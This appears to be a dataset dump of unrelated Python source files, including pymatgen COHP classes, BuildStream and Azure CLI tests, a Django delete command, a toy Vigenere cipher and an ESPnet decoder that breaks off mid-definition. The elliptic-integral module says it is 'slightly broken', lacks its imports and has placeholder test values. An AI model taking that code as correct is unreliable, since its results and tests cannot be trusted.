content
stringlengths 5
1.05M
|
|---|
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
from __future__ import division, unicode_literals
import six
import warnings
import numpy as np
from monty.json import MSONable
from pymatgen.electronic_structure.core import Spin, Orbital
from pymatgen.core.sites import PeriodicSite
from pymatgen.core.structure import Structure
from pymatgen.io.lmto import LMTOCopl
from pymatgen.io.lobster import Cohpcar
from pymatgen.util.num import round_to_sigfigs
from pymatgen.util.coord import get_linear_interpolated_value
"""
This module defines classes to represent crystal orbital Hamilton
populations (COHP) and integrated COHP (ICOHP), but can also be used
for crystal orbital overlap populations (COOP).
"""
__author__ = "Marco Esters"
__copyright__ = "Copyright 2017, The Materials Project"
__version__ = "0.2"
__maintainer__ = "Marco Esters"
__email__ = "esters@uoregon.edu"
__date__ = "Dec 13, 2017"
class Cohp(MSONable):
"""
Basic COHP object.
Args/attributes:
are_coops: Indicates whether this object describes COHPs or COOPs.
efermi: Fermi energy.
energies: A sequence of energies.
cohp ({Spin: np.array}): representing the COHP for each spin.
icohp ({Spin: np.array}): representing the ICOHP for each spin.
"""
def __init__(self, efermi, energies, cohp, are_coops=False, icohp=None):
self.are_coops = are_coops
self.efermi = efermi
self.energies = np.array(energies)
self.cohp = cohp
self.icohp = icohp
def __add__(self, other):
"""
Adds two COHP together. Checks that energy scales are the same.
Otherwise, it raises a ValueError. It also adds ICOHP if present.
If ICOHP is only present in one object, it displays a warning and
will not add ICOHP.
Args:
other: Another COHP object.
Returns:
Sum of the two COHPs as a COHP object.
"""
if not all(np.equal(self.energies, other.energies)):
raise ValueError("Energies of both COHP are not compatible.")
populations = {spin: self.populations[spin] + other.populations[spin]
for spin in self.cohp}
if self.icohp is not None and other.icohp is not None:
int_pop = {spin: self.icohp[spin] + other.icohp[spin]
for spin in self.icohp}
else:
if self.icohp is not None or other.icohp is not None:
warnings.warn("One of the COHP objects does not contain "
"ICOHPs. Setting ICOHP to None.")
int_pop = None
return Cohp(self.efermi, self.energies, populations, icohp=int_pop)
def __repr__(self):
return self.__str__()
def __str__(self):
"""
Returns a string that can be easily plotted (e.g. using gnuplot).
"""
cohpstring = "COOP" if self.are_coops else "COHP"
header = ["Energy", cohpstring + "Up"]
data = [self.energies, self.cohp[Spin.up]]
if Spin.down in self.cohp:
header.append(cohpstring + "Down")
data.append(self.cohp[Spin.down])
if self.icohp:
header.append("I" + cohpstring + "Up")
data.append(self.icohp[Spin.up])
if Spin.down in self.cohp:
header.append("I" + cohpstring + "Down")
data.append(self.icohp[Spin.down])
formatheader = "#" + " ".join(["{:15s}" for __ in header])
formatdata = " ".join(["{:.5f}" for __ in header])
stringarray = [formatheader.format(*header)]
for i, __ in enumerate(self.energies):
stringarray.append(formatdata.format(*[d[i] for d in data]))
return "\n".join(stringarray)
def as_dict(self):
"""
Json-serializable dict representation of COHP.
"""
d = {"@module": self.__class__.__module__,
"@class": self.__class__.__name__,
"are_coops": self.are_coops,
"efermi": self.efermi,
"energies": self.energies.tolist(),
"COHP": {str(spin): pops.tolist()
for spin, pops in self.cohp.items()}}
if self.icohp:
d["ICOHP"] = {str(spin): pops.tolist()
for spin, pops in self.icohp.items()}
return d
def get_cohp(self, spin=None, integrated=False):
"""
Returns the COHP or ICOHP for a particular spin.
Args:
spin: Spin. Can be parsed as spin object, integer (-1/1)
or str ("up"/"down")
integrated: Return COHP (False) or ICOHP (True)
Returns:
Returns the CHOP or ICOHP for the input spin. If Spin is
None and both spins are present, both spins will be returned
as a dictionary.
"""
if not integrated:
populations = self.cohp
else:
populations = self.icohp
if populations is None:
return None
elif spin is None:
return populations
else:
if isinstance(spin, six.integer_types):
spin = Spin(spin)
elif isinstance(spin, six.string_types):
s = {"up": 1, "down": -1}[spin.lower()]
spin = Spin(s)
return {spin: populations[spin]}
def get_icohp(self, spin=None):
"""
Convenient alternative to get the ICOHP for a particular spin.
"""
return self.get_cohp(spin=spin, integrated=True)
def get_interpolated_value(self, energy, integrated=False):
"""
Returns the COHP for a particular energy.
Args:
energy: Energy to return the COHP value for.
"""
inter = {}
for spin in self.cohp:
if not integrated:
inter[spin] = get_linear_interpolated_value(self.energies,
self.cohp[spin],
energy)
elif self.icohp is not None:
inter[spin] = get_linear_interpolated_value(self.energies,
self.icohp[spin],
energy)
else:
raise ValueError("ICOHP is empty.")
return inter
@classmethod
def from_dict(cls, d):
"""
Returns a COHP object from a dict representation of the COHP.
"""
if "ICOHP" in d:
icohp = {Spin(int(key)): np.array(val)
for key, val in d["ICOHP"].items()}
else:
icohp = None
return Cohp(d["efermi"], d["energies"],
{Spin(int(key)): np.array(val)
for key, val in d["COHP"].items()},
icohp=icohp, are_coops=d["are_coops"])
class CompleteCohp(Cohp):
"""
A wrapper class that defines an average COHP, and individual COHPs.
Args:
structure: Structure assosciated with this COHP.
avg_cohp: The average cohp as a COHP object.
cohps: A dict of COHP objects for individual bonds of the form
{label: COHP}
bonds: A dict containing information on the bonds of the form
{label: {key: val}}. The key-val pair can be any information
the user wants to put in, but typically contains the sites,
the bond length, and the number of bonds. If nothing is
supplied, it will default to an empty dict.
are_coops: indicates whether the Cohp objects are COHPs or COOPs.
Defauls to False for COHPs.
orb_res_cohp: Orbital-resolved COHPs.
.. attribute: are_coops
Indicates whether the object is of COOPs or COHPs.
.. attribute: efermi
Fermi energy
.. attribute: energies
Sequence of energies
.. attribute: structure
Structure associated with the COHPs.
.. attribute: cohp, icohp
The average COHP/ICOHP.
.. attribute: all_cohps
A dict of COHPs for individual bonds of the form {label: COHP}
.. attribute: orb_res_cohp
Orbital-resolved COHPs.
"""
def __init__(self, structure, avg_cohp, cohp_dict, bonds=None,
are_coops=False, orb_res_cohp=None):
super(CompleteCohp, self).__init__(avg_cohp.efermi,
avg_cohp.energies,
avg_cohp.cohp,
are_coops=are_coops,
icohp=avg_cohp.icohp)
self.structure = structure
self.are_coops = are_coops
self.all_cohps = cohp_dict
self.orb_res_cohp = orb_res_cohp
if bonds is None:
self.bonds = {label: {} for label in self.all_cohps.keys()}
else:
self.bonds = bonds
def __str__(self):
if self.are_coops:
return "Complete COOPs for " + str(self.structure)
else:
return "Complete COHPs for " + str(self.structure)
def as_dict(self):
"""
Json-serializable dict representation of CompleteCohp.
"""
d = {"@module": self.__class__.__module__,
"@class": self.__class__.__name__,
"are_coops": self.are_coops,
"efermi": self.efermi,
"structure": self.structure.as_dict(),
"energies": self.energies.tolist(),
"COHP": {"average": {str(spin): pops.tolist()
for spin, pops in
self.cohp.items()}}}
if self.icohp is not None:
d["ICOHP"] = {"average": {str(spin): pops.tolist()
for spin, pops in
self.icohp.items()}}
for label in self.all_cohps.keys():
d["COHP"].update({label: {str(spin): pops.tolist()
for spin, pops in
self.all_cohps[label].cohp.items()}})
if self.all_cohps[label].icohp is not None:
if "ICOHP" not in d.keys():
d["ICOHP"] = {label: {str(spin): pops.tolist()
for spin, pops in
self.all_cohps[label].icohp.items()}}
else:
d["ICOHP"].update({label: {str(spin): pops.tolist()
for spin, pops in
self.all_cohps[label].icohp.items()}})
if False in [bond_dict == {} for bond_dict in self.bonds.values()]:
d["bonds"] = {bond: {"length": self.bonds[bond]["length"],
"sites": [site.as_dict() for site
in self.bonds[bond]["sites"]]}
for bond in self.bonds}
if self.orb_res_cohp:
orb_dict = {}
for label in self.orb_res_cohp:
orb_dict[label] = {}
for orbs in self.orb_res_cohp[label]:
cohp = {str(spin): pops.tolist() for spin, pops in
self.orb_res_cohp[label][orbs]["COHP"].items()}
orb_dict[label][orbs] = {"COHP": cohp}
icohp = {str(spin): pops.tolist() for spin, pops in
self.orb_res_cohp[label][orbs]["ICOHP"].items()}
orb_dict[label][orbs]["ICOHP"] = icohp
orbitals = [[orb[0], orb[1].name] for orb in
self.orb_res_cohp[label][orbs]["orbitals"]]
orb_dict[label][orbs]["orbitals"] = orbitals
d["orb_res_cohp"] = orb_dict
return d
def get_cohp(self, label, spin=None, integrated=False):
"""
Get specific COHP or ICOHP. If label is not in the COHP labels,
try reversing the order of the sites.
Args:
spin: Spin. Can be parsed as spin object, integer (-1/1)
or str ("up"/"down")
integrated: Return COHP (False) or ICOHP (True)
Returns:
Returns the CHOP or ICOHP for the input spin. If Spin is
None and both spins are present, both spins will be returned
as a dictionary.
"""
if label.lower() == "average":
return self.cohp.get_cohp(spin=spin, integrated=integrated)
else:
try:
return self.all_cohps[label].get_cohp(spin=spin,
integrated=integrated)
except KeyError:
atoms = label.split("-")
label = atoms[1] + "-" + atoms[0]
return self.all_cohps[label].get_cohp(spin=spin,
integrated=integrated)
def get_icohp(self, label, spin=None):
"""
Convenient alternative to get a specific ICOHP.
"""
return self.get_cohp(label, spin=spin, integrated=True)
def get_orbital_resolved_cohp(self, label, orbitals):
"""
Get orbital-resolved COHP.
Args:
label: bond label.
orbitals: The orbitals as a label, or list or tuple of the form
[(n1, orbital1), (n2, orbital2)]. Orbitals can either be str,
int, or Orbital.
Returns:
A Cohp object if CompleteCohp contains orbital-resolved cohp,
or None if it doesn't.
Note: It currently assumes that orbitals are str if they aren't the
other valid types. This is not ideal, but the easiest way to
avoid unicode issues between python 2 and python 3.
"""
if self.orb_res_cohp is None:
return None
elif isinstance(orbitals, list) or isinstance(orbitals, tuple):
cohp_orbs = [d["orbitals"] for d in
self.orb_res_cohp[label].values()]
orbs = []
for orbital in orbitals:
if isinstance(orbital[1], int):
orbs.append(tuple((orbital[0], Orbital(orbital[1]))))
elif isinstance(orbital[1], Orbital):
orbs.append(tuple((orbital[0], orbital[1])))
elif isinstance(orbital[1], six.string_types):
orbs.append(tuple((orbital[0], Orbital[orbital[1]])))
else:
raise TypeError("Orbital must be str, int, or Orbital.")
orb_index = cohp_orbs.index(orbs)
orb_label = list(self.orb_res_cohp[label].keys())[orb_index]
elif isinstance(orbitals, six.string_types):
orb_label = orbitals
else:
raise TypeError("Orbitals must be str, list, or tuple.")
try:
icohp = self.orb_res_cohp[label][orb_label]["ICOHP"]
except KeyError:
icohp = None
return Cohp(self.efermi, self.energies,
self.orb_res_cohp[label][orb_label]["COHP"],
icohp=icohp, are_coops=self.are_coops)
@classmethod
def from_dict(cls, d):
"""
Returns CompleteCohp object from dict representation.
"""
cohp_dict = {}
efermi = d["efermi"]
energies = d["energies"]
structure = Structure.from_dict(d["structure"])
if "bonds" in d.keys():
bonds = {bond: {"length": d["bonds"][bond]["length"],
"sites": tuple(PeriodicSite.from_dict(site)
for site in d["bonds"][bond]["sites"])}
for bond in d["bonds"]}
else:
bonds = None
for label in d["COHP"]:
cohp = {Spin(int(spin)): np.array(d["COHP"][label][spin])
for spin in d["COHP"][label]}
try:
icohp = {Spin(int(spin)): np.array(d["ICOHP"][label][spin])
for spin in d["ICOHP"][label]}
except KeyError:
icohp = None
if label == "average":
avg_cohp = Cohp(efermi, energies, cohp, icohp=icohp)
else:
cohp_dict[label] = Cohp(efermi, energies, cohp, icohp=icohp)
if "orb_res_cohp" in d.keys():
orb_cohp = {}
for label in d["orb_res_cohp"]:
orb_cohp[label] = {}
for orb in d["orb_res_cohp"][label]:
cohp = {Spin(int(s)): np.array(
d["orb_res_cohp"][label][orb]["COHP"][s],
dtype=float)
for s in d["orb_res_cohp"][label][orb]["COHP"]}
try:
icohp = {Spin(int(s)): np.array(
d["orb_res_cohp"][label][orb]["ICOHP"][s],
dtype=float)
for s in d["orb_res_cohp"][label][orb]["ICOHP"]}
except KeyError:
icohp = None
orbitals = [tuple((int(o[0]), Orbital[o[1]])) for o in
d["orb_res_cohp"][label][orb]["orbitals"]]
orb_cohp[label][orb] = {"COHP": cohp, "ICOHP": icohp,
"orbitals": orbitals}
# If no total COHPs are present, calculate the total
# COHPs from the single-orbital populations. Total COHPs
# may not be present when the cohpgenerator keyword is used
# in LOBSTER versions 2.2.0 and earlier.
if label not in d["COHP"] or d["COHP"][label] is None:
cohp = {Spin.up: np.sum(np.array(
[orb_cohp[label][orb]["COHP"][Spin.up]
for orb in orb_cohp[label]]), axis=0)}
try:
cohp[Spin.down] = np.sum(np.array(
[orb_cohp[label][orb]["COHP"][Spin.down]
for orb in orb_cohp[label]]), axis=0)
except KeyError:
pass
orb_res_icohp = None in [orb_cohp[label][orb]["ICOHP"]
for orb in orb_cohp[label]]
if (label not in d["ICOHP"] or
d["ICOHP"][label] is None) and orb_res_icohp:
icohp = {Spin.up: np.sum(np.array(
[orb_cohp[label][orb]["ICOHP"][Spin.up]
for orb in orb_cohp[label]]), axis=0)}
try:
icohp[Spin.down] = np.sum(np.array(
[orb_cohp[label][orb]["ICOHP"][Spin.down]
for orb in orb_cohp[label]]), axis=0)
except KeyError:
pass
else:
orb_cohp = None
if "average" not in d["COHP"].keys():
# calculate average
cohp = np.array([np.array(c)
for c in d["COHP"].values()]).mean(axis=0)
try:
icohp = np.array([np.array(c)
for c in d["ICOHP"].values()]).mean(axis=0)
except KeyError:
icohp = None
avg_cohp = Cohp(efermi, energies, cohp, icohp=icohp)
return CompleteCohp(structure, avg_cohp, cohp_dict, bonds=bonds,
are_coops=d["are_coops"], orb_res_cohp=orb_cohp)
@classmethod
def from_file(cls, fmt, filename=None,
structure_file=None, are_coops=False):
"""
Creates a CompleteCohp object from an output file of a COHP
calculation. Valid formats are either LMTO (for the Stuttgart
LMTO-ASA code) or LOBSTER (for the LOBSTER code).
Args:
cohp_file: Name of the COHP output file. Defaults to COPL
for LMTO and COHPCAR.lobster/COOPCAR.lobster for LOBSTER.
are_coops: Indicates whether the populations are COOPs or
COHPs. Defaults to False for COHPs.
fmt: A string for the code that was used to calculate
the COHPs so that the output file can be handled
correctly. Can take the values "LMTO" or "LOBSTER".
structure_file: Name of the file containing the structure.
If no file name is given, use CTRL for LMTO and POSCAR
for LOBSTER.
Returns:
A CompleteCohp object.
"""
fmt = fmt.upper()
if fmt == "LMTO":
# LMTO COOPs and orbital-resolved COHP cannot be handled yet.
are_coops = False
orb_res_cohp = None
if structure_file is None:
structure_file = "CTRL"
if filename is None:
filename = "COPL"
cohp_file = LMTOCopl(filename=filename, to_eV=True)
elif fmt == "LOBSTER":
if structure_file is None:
structure_file = "POSCAR"
if filename is None:
filename = "COOPCAR.lobster" if are_coops \
else "COHPCAR.lobster"
cohp_file = Cohpcar(filename=filename, are_coops=are_coops)
orb_res_cohp = cohp_file.orb_res_cohp
else:
raise ValueError("Unknown format %s. Valid formats are LMTO "
"and LOBSTER." % fmt)
structure = Structure.from_file(structure_file)
efermi = cohp_file.efermi
cohp_data = cohp_file.cohp_data
energies = cohp_file.energies
# Lobster shifts the energies so that the Fermi energy is at zero.
# Shifting should be done by the plotter object though.
spins = [Spin.up, Spin.down] if cohp_file.is_spin_polarized \
else [Spin.up]
if fmt == "LOBSTER":
energies += efermi
if orb_res_cohp is not None:
# If no total COHPs are present, calculate the total
# COHPs from the single-orbital populations. Total COHPs
# may not be present when the cohpgenerator keyword is used
# in LOBSTER versions 2.2.0 and earlier.
for label in orb_res_cohp:
if cohp_file.cohp_data[label]["COHP"] is None:
cohp_data[label]["COHP"] = \
{sp: np.sum([orb_res_cohp[label][orbs]["COHP"][sp]
for orbs in orb_res_cohp[label]],
axis=0) for sp in spins}
if cohp_file.cohp_data[label]["ICOHP"] is None:
cohp_data[label]["ICOHP"] = \
{sp: np.sum([orb_res_cohp[label][orbs]["ICOHP"][sp]
for orbs in orb_res_cohp[label]],
axis=0) for sp in spins}
if fmt == "LMTO":
# Calculate the average COHP for the LMTO file to be
# consistent with LOBSTER output.
avg_data = {"COHP": {}, "ICOHP": {}}
for i in avg_data:
for spin in spins:
rows = np.array([cohp_data[label][i][spin]
for label in cohp_data])
avg = np.average(rows, axis=0)
# LMTO COHPs have 5 significant figures
avg_data[i].update({spin:
np.array([round_to_sigfigs(a, 5)
for a in avg],
dtype=float)})
avg_cohp = Cohp(efermi, energies,
avg_data["COHP"],
icohp=avg_data["ICOHP"])
else:
avg_cohp = Cohp(efermi, energies,
cohp_data["average"]["COHP"],
icohp=cohp_data["average"]["COHP"],
are_coops=are_coops)
del cohp_data["average"]
cohp_dict = {label: Cohp(efermi, energies,
cohp_data[label]["COHP"],
icohp=cohp_data[label]["ICOHP"],
are_coops=are_coops)
for label in cohp_data}
bond_dict = {label: {"length": cohp_data[label]["length"],
"sites": [structure.sites[site]
for site in cohp_data[label]["sites"]]}
for label in cohp_data}
return CompleteCohp(structure, avg_cohp, cohp_dict, bonds=bond_dict,
are_coops=are_coops, orb_res_cohp=orb_res_cohp)
|
#!/usr/bin/env python
import torch as th
from torch import Tensor as T
from torch.autograd import Variable as V
from lstms import LayerNorm, LSTM, LayerNormLSTM
if __name__ == '__main__':
th.manual_seed(1234)
# vec = T(1, 1, 5).fill_(1.0)
vec = V(th.rand(1, 1, 5))
ln = LayerNorm(5, learnable=False)
print(ln(vec))
ln = LayerNorm(5, learnable=True)
print(ln(vec))
for p in ln.parameters():
print(p)
lstm = LSTM(5, 5)
asdf, (a, e) = lstm(ln(vec), (vec, vec))
print(asdf)
|
MEAN_TOLERANCE = 1.e-10
def ag_mean(a,b,tolerance):
'''
Computes arithmetic-geometric mean of A and B
https://scipython.com/book/chapter-2-the-core-python-language-i/questions/the-arithmetic-geometric-mean/
'''
while abs(a-b) > tolerance:
a, b = (a + b) / 2.0, math.sqrt(a * b)
return b
def first_kind_elliptic_integral(k):
'''
Calculate K(k) - okay?
https://dlmf.nist.gov/19
§19.8(i) Gauss’s Arithmetic-Geometric Mean (AGM)
'''
return (math.pi/2.0)/ag_mean(1,math.sqrt(1.0-(k**2.0)), MEAN_TOLERANCE)
def compute_big_M(m):
'''
Prerequisite for E(m)
'''
return (math.pi/(2.0*first_kind_elliptic_integral(m)*math.sqrt(1-m**2.0)))
def compute_delta(m):
'''
Prerequisite for E(m)
'''
return (1.0/math.sqrt(1.0-(m**2.0)))
def differentiate_delta_over_M(m):
'''
Another prerequisite for E(m)
Numerically differentiate the quotient delta/M
'''
dm=1.0e-6
return (((compute_delta(m+dm)/compute_big_M(m+dm))-(compute_delta(m)/compute_big_M(m)))/dm)
def second_kind_elliptic_integral(m):
'''
Calculate E(m)inem
E says blow, we increase emittance
receive remittance
percieve:
society's been enhanced
oh we got them in a trance
science's now advanced
in common parlance:
dance
From @ kurzweg2012
Efficiency could be improved by eliminating duplicate calls of big_M and compute_delta(m)
Currently slightly broken.
'''
return (math.pi/2.0)/((1.0/(compute_big_M(m)*compute_delta(m))) + (m*differentiate_delta_over_M(m)))
class TestAll(unittest.TestCase):
def test_ag_mean(self):
self.assertAlmostEqual(ag_mean(24,6,1e-7), 13.458, places=3)
def test_first_kind_elliptic_integral(self):
self.assertAlmostEqual(first_kind_elliptic_integral(0.5), 1.685751, places=3)
self.assertAlmostEqual(first_kind_elliptic_integral(0), 1.57079632, places=3)
def test_big_M(self):
self.assertAlmostEqual(compute_big_M(0.5), 1.07595, places=3)
def test_differentiate_delta_over_M(self):
self.assertAlmostEqual(differentiate_delta_over_M(0), 1.6, places=3)
self.assertAlmostEqual(differentiate_delta_over_M(0.9), 1.6, places=3)
def test_second_kind_elliptic_integral(self):
self.assertAlmostEqual(second_kind_elliptic_integral(0), 1.5707963, places=3)
self.assertAlmostEqual(second_kind_elliptic_integral(0.9), 1.15, places=3)
|
from django.core.management.base import BaseCommand, CommandError
from TaskScheduler.models import Blocked
from prompt_toolkit import prompt
from datetime import datetime
import pytz
# from prompt_toolkit.contrib.completers import WordCompleter
class Command(BaseCommand):
help = 'Creates a new task to schedule'
def add_arguments(self, parser):
parser.add_argument('type', nargs='+', type=str)
parser.add_argument('filter_value', nargs='+', type=str)
print()
def handle(self, *args, **options):
for option in options["type"]:
if option == "id":
for blocked_id in options["filter_value"]:
b = Blocked.objects.get(pk=int(blocked_id))
delete = prompt("> Delete? (y-yes)")
if delete == "y" or delete == "Y":
print("Deleting blocked!")
b.delete()
elif option == "name":
for name in options["filter_value"]:
blocked = Blocked.objects.all().filter(name=name)
for b in blocked:
delete = prompt("> Delete"+b.name+", id: "+str(b.id)+"? (y-yes)")
if delete == "y" or delete == "Y":
print("Deleting blocked!")
b.delete()
self.stdout.write(self.style.SUCCESS("Successfully deleted blocked"))
|
from hacker.settings import USERNAME
print(USERNAME[::-1])
|
# Pylint doesn't play well with fixtures and dependency injection from pytest
# pylint: disable=redefined-outer-name
import os
import pytest
from buildstream.exceptions import ErrorDomain, LoadErrorReason
from buildstream._testing.runcli import cli # pylint: disable=unused-import
# Project directory
DATA_DIR = os.path.dirname(os.path.realpath(__file__))
@pytest.mark.datafiles(DATA_DIR)
def test_project_error(cli, datafiles):
project = os.path.join(datafiles.dirname, datafiles.basename, "list-directive-error-project")
result = cli.run(
project=project, silent=True, args=["show", "--deps", "none", "--format", "%{vars}", "element.bst"]
)
result.assert_main_error(ErrorDomain.LOAD, LoadErrorReason.TRAILING_LIST_DIRECTIVE)
@pytest.mark.datafiles(DATA_DIR)
@pytest.mark.parametrize("target", [("variables.bst"), ("environment.bst"), ("config.bst"), ("public.bst")])
def test_element_error(cli, datafiles, target):
project = os.path.join(datafiles.dirname, datafiles.basename, "list-directive-error-element")
result = cli.run(project=project, silent=True, args=["show", "--deps", "none", "--format", "%{vars}", target])
result.assert_main_error(ErrorDomain.LOAD, LoadErrorReason.TRAILING_LIST_DIRECTIVE)
@pytest.mark.datafiles(DATA_DIR)
def test_project_composite_error(cli, datafiles):
project = os.path.join(datafiles.dirname, datafiles.basename, "list-directive-type-error")
result = cli.run(
project=project, silent=True, args=["show", "--deps", "none", "--format", "%{vars}", "element.bst"]
)
result.assert_main_error(ErrorDomain.LOAD, LoadErrorReason.ILLEGAL_COMPOSITE)
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import os
import tempfile
import unittest
from unittest.mock import MagicMock
from azure.cli.testsdk import ScenarioTest, LocalContextScenarioTest
from knack.util import CLIError
class ConfigTest(ScenarioTest):
def test_config(self):
# [test_section1]
# test_option1 = test_value1
#
# [test_section2]
# test_option21 = test_value21
# test_option22 = test_value22
# C:\Users\{username}\AppData\Local\Temp
tempdir = tempfile.gettempdir()
original_path = os.getcwd()
os.chdir(tempdir)
print("Using temp dir: {}".format(tempdir))
global_test_args = {"source": os.path.expanduser(os.path.join('~', '.azure', 'config')), "flag": ""}
local_test_args = {"source": os.path.join(tempdir, '.azure', 'config'), "flag": " --local"}
for args in (global_test_args, local_test_args):
test_option1_expected = {'name': 'test_option1', 'source': args["source"], 'value': 'test_value1'}
test_option21_expected = {'name': 'test_option21', 'source': args["source"], 'value': 'test_value21'}
test_option22_expected = {'name': 'test_option22', 'source': args["source"], 'value': 'test_value22'}
test_section1_expected = [test_option1_expected]
test_section2_expected = [test_option21_expected, test_option22_expected]
# 1. set
# Test setting one option
self.cmd('config set test_section1.test_option1=test_value1' + args['flag'])
# Test setting multiple options
self.cmd('config set test_section2.test_option21=test_value21 test_section2.test_option22=test_value22' + args['flag'])
# 2. get
# 2.1 Test get all sections
output = self.cmd('config get' + args['flag']).get_output_in_json()
self.assertListEqual(output['test_section1'], test_section1_expected)
self.assertListEqual(output['test_section2'], test_section2_expected)
# 2.2 Test get one section
output = self.cmd('config get test_section1' + args['flag']).get_output_in_json()
self.assertListEqual(output, test_section1_expected)
output = self.cmd('config get test_section2' + args['flag']).get_output_in_json()
self.assertListEqual(output, test_section2_expected)
# 2.3 Test get one item
output = self.cmd('config get test_section1.test_option1' + args['flag']).get_output_in_json()
self.assertDictEqual(output, test_option1_expected)
output = self.cmd('config get test_section2.test_option21' + args['flag']).get_output_in_json()
self.assertDictEqual(output, test_option21_expected)
output = self.cmd('config get test_section2.test_option22' + args['flag']).get_output_in_json()
self.assertDictEqual(output, test_option22_expected)
with self.assertRaises(CLIError):
self.cmd('config get test_section1.test_option22' + args['flag'])
# 3. unset
# Test unsetting one option
self.cmd('config unset test_section1.test_option1' + args['flag'])
# Test unsetting multiple options
self.cmd('config unset test_section2.test_option21 test_section2.test_option22' + args['flag'])
os.chdir(original_path)
if __name__ == '__main__':
unittest.main()
|
#!/usr/bin/env python
'''
VIGENERE SQUARE:
a b c d e f g h i j k l m n o p q r s t u v w x y z
b c d e f g h i j k l m n o p q r s t u v w x y z a
c d e f g h i j k l m n o p q r s t u v w x y z a b
d e f g h i j k l m n o p q r s t u v w x y z a b c
e f g h i j k l m n o p q r s t u v w x y z a b c d
f g h i j k l m n o p q r s t u v w x y z a b c d e
g h i j k l m n o p q r s t u v w x y z a b c d e f
h i j k l m n o p q r s t u v w x y z a b c d e f g
i j k l m n o p q r s t u v w x y z a b c d e f g h
j k l m n o p q r s t u v w x y z a b c d e f g h i
k l m n o p q r s t u v w x y z a b c d e f g h i j
l m n o p q r s t u v w x y z a b c d e f g h i j k
m n o p q r s t u v w x y z a b c d e f g h i j k l
n o p q r s t u v w x y z a b c d e f g h i j k l m
o p q r s t u v w x y z a b c d e f g h i j k l m n
p q r s t u v w x y z a b c d e f g h i j k l m n o
q r s t u v w x y z a b c d e f g h i j k l m n o p
r s t u v w x y z a b c d e f g h i j k l m n o p q
s t u v w x y z a b c d e f g h i j k l m n o p q r
t u v w x y z a b c d e f g h i j k l m n o p q r s
u v w x y z a b c d e f g h i j k l m n o p q r s t
v w x y z a b c d e f g h i j k l m n o p q r s t u
w x y z a b c d e f g h i j k l m n o p q r s t u v
y z a b c d e f g h i j k l m n o p q r s t u v w x
z a b c d e f g h i j k l m n o p q r s t u v w x y
'''
import sys
import argparse
def main():
args = get_args()
final = vigenere_shift(args)
print final
def clean(message, key):
'''
Clean our message and key so they're pretty.
:param dictionary: args
See rot13 for description
'''
dirty_text = list(message) # [97-122]
dirty_key = list(key)
def num_det(letter):
if ord(letter.lower()) >= 97 and ord(letter.lower()) <= 122:
return letter.lower()
else:
return ''
clean_text = ''.join([num_det(char) for char in dirty_text])
clean_key = [ord(character) for character in
list(''.join([num_det(char) for char in dirty_key]))]
return clean_text, clean_key
def vigenere_shift(args):
'''
Shift our message and return
:param dictionary: args
'''
clean_text, clean_key = clean(args.message, args.key)
letter = 0
ciphertext = ''
for byte in clean_text:
chr_enc = shift_byte(byte, clean_key[letter], args.decrypt)
ciphertext += chr_enc
letter = (letter + 1) % len(clean_key) # Cycle keyword
return ciphertext
def shift_byte(byte, shift, decrypt):
'''
Shift our byte using the correct alphabet in the correct direction
:param string: byte
:param int: shift
:param decrypt: bool
See rot13 for description
'''
nRangeByte = (ord(byte) + 7) % 26
nRangeShift = (shift + 7) % 26
if decrypt:
encoded_byte = chr(((nRangeByte - nRangeShift) % 26) + 97)
else:
encoded_byte = chr(((nRangeByte + nRangeShift) % 26) + 97)
return encoded_byte
def get_args():
default_message = 'The Quick Brown fox lept Over THE lazy dog'
parser = argparse.ArgumentParser()
parser.add_argument('-e', '--encrypt',
action='store_true',
help='Encrypt')
parser.add_argument('-d', '--decrypt',
action='store_true',
help='Decrypt')
parser.add_argument('-k', '--key',
type=str, default='Ki5Ng',
help='The keyword for encryption or decryption')
parser.add_argument('-f', '--filename',
type=str, default=None,
help='This is the name of the read/write file')
parser.add_argument('-m', '--message',
type=str,
default=default_message,
help='Message to encode')
args = parser.parse_args()
if args.encrypt is False and args.decrypt is False:
args.encrypt = True
if args.decrypt and args.message is default_message:
args.message = 'dprweqpqlzbcxnbdvmczydrxdprrkhljyo'
if args.filename:
args.message = open(args.filename, 'r').read()
return args
if __name__ == "__main__":
sys.exit(main())
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2019 Hang Le (hangtp.le@gmail.com)
"""Dual-decoder definition."""
import logging
import torch
from torch import nn
from espnet.nets.pytorch_backend.transformer.attention import MultiHeadedAttention
from espnet.nets.pytorch_backend.transformer.decoder_layer_dual import DualDecoderLayer
from espnet.nets.pytorch_backend.transformer.embedding import PositionalEncoding
from espnet.nets.pytorch_backend.transformer.layer_norm import LayerNorm
from espnet.nets.pytorch_backend.transformer.mask import subsequent_mask
from espnet.nets.pytorch_backend.transformer.positionwise_feed_forward import PositionwiseFeedForward
from espnet.nets.pytorch_backend.transformer.repeat import repeat
from espnet.nets.scorer_interface import ScorerInterface
from espnet.nets.pytorch_backend.transformer.adapter import Adapter
class DualDecoder(ScorerInterface, torch.nn.Module):
"""Transfomer decoder module.
:param int odim: output dim
:param int attention_dim: dimention of attention
:param int attention_heads: the number of heads of multi head attention
:param int linear_units: the number of units of position-wise feed forward
:param int num_blocks: the number of decoder blocks
:param float dropout_rate: dropout rate
:param float attention_dropout_rate: dropout rate for attention
:param str or torch.nn.Module input_layer: input layer type
:param bool use_output_layer: whether to use output layer
:param class pos_enc_class: PositionalEncoding or ScaledPositionalEncoding
:param bool normalize_before: whether to use layer_norm before the first block
:param bool concat_after: whether to concat attention layer's input and output
if True, additional linear will be applied. i.e. x -> x + linear(concat(x, att(x)))
if False, no additional linear will be applied. i.e. x -> x + att(x)
"""
def __init__(self,
odim_tgt,
odim_src,
attention_dim=256,
attention_heads=4,
linear_units=2048,
num_blocks=6,
dropout_rate=0.1,
positional_dropout_rate=0.1,
self_attention_dropout_rate=0.0,
src_attention_dropout_rate=0.0,
input_layer="embed",
use_output_layer=True,
pos_enc_class=PositionalEncoding,
normalize_before=True,
concat_after=False,
cross_operator=None,
cross_weight_learnable=False,
cross_weight=0.0,
cross_self=False,
cross_src=False,
cross_to_asr=True,
cross_to_st=True,
adapter_names=None,
reduction_factor=8,
):
"""Construct an Decoder object."""
torch.nn.Module.__init__(self)
if input_layer == "embed":
self.embed = torch.nn.Sequential(
torch.nn.Embedding(odim_tgt, attention_dim),
pos_enc_class(attention_dim, positional_dropout_rate)
)
self.embed_asr = torch.nn.Sequential(
